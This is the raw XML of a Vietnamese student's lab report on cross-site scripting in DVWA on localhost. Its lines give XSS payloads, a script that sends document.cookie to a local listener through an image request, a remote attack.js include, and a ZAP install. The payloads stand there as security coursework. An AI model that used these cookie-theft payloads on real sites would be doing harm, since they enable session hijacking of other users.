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63DCE" w14:textId="77777777" w:rsidR="00420B67" w:rsidRPr="00DE7024" w:rsidRDefault="00420B67" w:rsidP="00420B67">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE7024">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tên: Lê Hoài Linh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476DB697" w14:textId="77777777" w:rsidR="00420B67" w:rsidRPr="00DE7024" w:rsidRDefault="00420B67" w:rsidP="00420B67">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE7024">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MSSV: 0950080129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5702A5E2" w14:textId="77777777" w:rsidR="00420B67" w:rsidRPr="00DE7024" w:rsidRDefault="00420B67" w:rsidP="00420B67">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE7024">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Lớp 09CNPM3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA2B694" w14:textId="77777777" w:rsidR="00420B67" w:rsidRPr="00DE7024" w:rsidRDefault="00420B67" w:rsidP="00420B67">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE7024">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Link </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DE7024">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Youtube :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DE7024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Pr="00DE7024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https://www.youtube.com/@LinhLeHoai-mu4xi/videos</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="74605DD9" w14:textId="26018857" w:rsidR="00535EA6" w:rsidRPr="00420B67" w:rsidRDefault="00535EA6" w:rsidP="00535EA6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00420B67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>LAB 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F20CD70" w14:textId="77777777" w:rsidR="00535EA6" w:rsidRPr="00420B67" w:rsidRDefault="00535EA6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="281C1451" w14:textId="49D58374" w:rsidR="005D5B62" w:rsidRPr="00420B67" w:rsidRDefault="0041687F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>B</w:t>
      </w:r>
      <w:r w:rsidR="00535EA6" w:rsidRPr="00420B67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ài</w:t>
      </w:r>
      <w:r w:rsidRPr="00420B67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32130A68" w14:textId="4E8748CF" w:rsidR="004B7479" w:rsidRPr="00420B67" w:rsidRDefault="004B7479" w:rsidP="004B7479">
      <w:pPr>
        <w:jc w:val="center"/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0101CB" wp14:editId="3E8A86A1">
            <wp:extent cx="5661068" cy="4610100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="100625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5480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5792" r="26346"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5677223" cy="462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473B" w14:textId="1226D36D" w:rsidR="0041687F" w:rsidRPr="00420B67" w:rsidRDefault="004B7479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689BCBC" wp14:editId="6EE94A75">
            <wp:extent cx="5731510" cy="4849495"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="489839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93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BD9C" w14:textId="233B7F49" w:rsidR="0041687F" w:rsidRPr="00420B67" w:rsidRDefault="00420B67" w:rsidP="00420B67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>http://localhost/vulnerabilities/xss_s/?default=English&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00420B67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>document.cookie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)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3FFAD6" w14:textId="15F5D803" w:rsidR="0041687F" w:rsidRPr="00420B67" w:rsidRDefault="004B7479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6CB6D8" wp14:editId="11B3A080">
            <wp:extent cx="5821680" cy="2926080"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="27105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5956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-1" r="-1573" b="40664"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="58216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7A0B" w14:textId="77777777" w:rsidR="00420B67" w:rsidRDefault="00420B67" w:rsidP="00D45D48">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66828815" w14:textId="3C8EE9EA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t xml:space="preserve">function </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00420B67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>getimg(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) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AB800C" w14:textId="77777777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ab/>
        <w:t xml:space="preserve">var img = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00420B67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>document.createElement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('img');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265C0DD9" w14:textId="77777777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ab/>
        <w:t xml:space="preserve">img.src = 'http://localhost:9999/' + </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00420B67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>document.cookie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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348C0E3B" w14:textId="77777777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20B67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>document.body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.appendChild(img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0AC373" w14:textId="77777777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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F900B2" w14:textId="77777777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</w:p>
    <w:p w14:paraId="36710F59" w14:textId="6C2ED4C8" w:rsidR="00D45D48" w:rsidRPr="00420B67" w:rsidRDefault="00D45D48" w:rsidP="00D45D48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420B67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>getimg(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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0049FD06" w14:textId="2BF1415B" w:rsidR="00D45D48" w:rsidRPr="00420B67" w:rsidRDefault="004B7479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64F987" wp14:editId="61A16DEF">
            <wp:extent cx="5731510" cy="1960880"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="1266361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11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380" w14:textId="77777777" w:rsidR="004B7479" w:rsidRPr="00420B67" w:rsidRDefault="004B7479">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BE37F77" w14:textId="77777777" w:rsidR="004B7479" w:rsidRPr="00420B67" w:rsidRDefault="004B7479" w:rsidP="004B7479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 xml:space="preserve">python2 -m SimpleHTTPServer 9999  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119DDF09" w14:textId="77777777" w:rsidR="004B7479" w:rsidRPr="00420B67" w:rsidRDefault="004B7479" w:rsidP="004B7479">
      <w:pPr>
        <w:jc w:val="center"/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8217D6" wp14:editId="49D95617">
            <wp:extent cx="3096057" cy="933580"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="7894209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0969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10E8" w14:textId="77777777" w:rsidR="004B7479" w:rsidRPr="00420B67" w:rsidRDefault="004B7479">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73423B7D" w14:textId="4E819FF1" w:rsidR="00D45D48" w:rsidRPr="00420B67" w:rsidRDefault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>&lt;script src="http://localhost:9999/attack.js"&gt;&lt;/sc</w:t>
      </w:r>
      <w:r w:rsidR="00F91861" w:rsidRPr="00420B67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ript&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6632A0" w14:textId="77777777" w:rsidR="004B7479" w:rsidRPr="00420B67" w:rsidRDefault="004B7479">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof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EEA57F" wp14:editId="451881F7">
            <wp:extent cx="5731510" cy="4161155"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="171799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15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B67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA5ED92" w14:textId="153773E7" w:rsidR="00D45D48" w:rsidRPr="00420B67" w:rsidRDefault="004B7479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60BEFE" wp14:editId="02265FD7">
            <wp:extent cx="5731510" cy="2133600"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="211355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80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D48" w:rsidRPr="00420B67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7349AAEA" w14:textId="4BD18F2E" w:rsidR="00D45D48" w:rsidRPr="00420B67" w:rsidRDefault="00274539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6867CCC" wp14:editId="28FCCFD9">
            <wp:extent cx="5731510" cy="2561590"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1461000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09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B67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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CC7083" wp14:editId="3204F654">
            <wp:extent cx="5731510" cy="2564765"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="157077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730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34BC" w14:textId="5A21EBCB" w:rsidR="00F91861" w:rsidRPr="00420B67" w:rsidRDefault="00274539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25FAA6E" wp14:editId="5E63A5F1">
            <wp:extent cx="5731510" cy="3735705"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="102694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427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B14B" w14:textId="63D0C12D" w:rsidR="00F91861" w:rsidRPr="00420B67" w:rsidRDefault="00274539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8FB8EF" wp14:editId="6AF79B55">
            <wp:extent cx="5731510" cy="2046605"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="131050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057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2216" w14:textId="5AE4FC53" w:rsidR="00284363" w:rsidRPr="00420B67" w:rsidRDefault="00284363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>&lt;body onload="alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00420B67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00420B67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2830135B" w14:textId="5FEDFC38" w:rsidR="00284363" w:rsidRPr="00420B67" w:rsidRDefault="00284363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F1E9A7" wp14:editId="4A549F0C">
            <wp:extent cx="5731510" cy="4079240"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="163845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59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5F30" w14:textId="0FBE31D1" w:rsidR="00284363" w:rsidRPr="00420B67" w:rsidRDefault="00274539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89DE18" wp14:editId="50CA27C4">
            <wp:extent cx="5731510" cy="2880759"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="130303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5956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-1" r="-1573" b="40664"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="288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9713" w14:textId="77777777" w:rsidR="00284363" w:rsidRPr="00420B67" w:rsidRDefault="00284363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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="132C37B6" w14:textId="4528BE1D" w:rsidR="00284363" w:rsidRPr="00420B67" w:rsidRDefault="00284363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t>B</w:t>
      </w:r>
      <w:r w:rsidR="00535EA6" w:rsidRPr="00420B67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ài 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00420B67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4531BE" w14:textId="06804995" w:rsidR="00947DCA" w:rsidRPr="00420B67" w:rsidRDefault="005426F2" w:rsidP="00D45D48">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00420B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938E68" wp14:editId="5D76E556">
            <wp:extent cx="5731510" cy="2295525"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="457211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18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363" w:rsidRPr="00420B6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420B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8C36F2" wp14:editId="202A9DC8">
            <wp:extent cx="5731510" cy="2291715"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="88798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78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CA" w:rsidRPr="00420B67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726733E" w14:textId="77777777" w:rsidR="005426F2" w:rsidRPr="00420B67" w:rsidRDefault="00947DCA" w:rsidP="00D45D48">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00420B67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>http://localhost/hackable/uploads/attack.js</w:t>
      </w:r>
      <w:r w:rsidRPr="00420B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1D1BEA" wp14:editId="1AE349B3">
            <wp:extent cx="5731510" cy="5130800"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="206826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63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B67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3D31449" w14:textId="0ACBCA8E" w:rsidR="00947DCA" w:rsidRPr="00420B67" w:rsidRDefault="005426F2" w:rsidP="00D45D48">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00420B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8B8F96" wp14:editId="7AD9A63F">
            <wp:extent cx="5731510" cy="1285875"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="50003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331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26B0" w14:textId="77777777" w:rsidR="00947DCA" w:rsidRPr="00420B67" w:rsidRDefault="00947DCA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00420B67"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18DE4D81" w14:textId="4DF3096D" w:rsidR="00284363" w:rsidRPr="00420B67" w:rsidRDefault="00535EA6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lastRenderedPageBreak/>
        <w:t>Bai 4</w:t>
      </w:r>
      <w:r w:rsidR="00947DCA" w:rsidRPr="00420B67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196268D9" w14:textId="6B434050" w:rsidR="00947DCA" w:rsidRPr="00420B67" w:rsidRDefault="00947DCA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t>sudo apt update &amp;&amp; sudo apt install zaproxy -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4298DB8F" w14:textId="7C207BBE" w:rsidR="00947DCA" w:rsidRPr="00420B67" w:rsidRDefault="00420B67" w:rsidP="00D45D48">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00420B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3832B8" wp14:editId="32DE93EA">
            <wp:extent cx="5731510" cy="3918585"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="140748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14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6A97" w14:textId="3B3B51F6" w:rsidR="00535EA6" w:rsidRPr="00420B67" w:rsidRDefault="00535EA6" w:rsidP="00D45D48">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00535EA6" w:rsidRPr="00420B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87F"/>
    <w:rsid w:val="001368FA"/>
    <w:rsid w:val="00274539"/>
    <w:rsid w:val="00284363"/>
    <w:rsid w:val="0041687F"/>
    <w:rsid w:val="00420B67"/>
    <w:rsid w:val="004B7479"/>
    <w:rsid w:val="00535EA6"/>
    <w:rsid w:val="005426F2"/>
    <w:rsid w:val="0056158A"/>
    <w:rsid w:val="00572E18"/>
    <w:rsid w:val="005D5B62"/>
    <w:rsid w:val="00947DCA"/>
    <w:rsid w:val="00D45D48"/>
    <w:rsid w:val="00EB712C"/>
    <w:rsid w:val="00F9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ADC9CA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{210924A1-7A71-4EC6-9259-B394EE9F2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6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1687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47D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D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5E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1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@LinhLeHoai-mu4xi/video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Minh Dương</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>linh lê</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-09T10:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-09T10:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>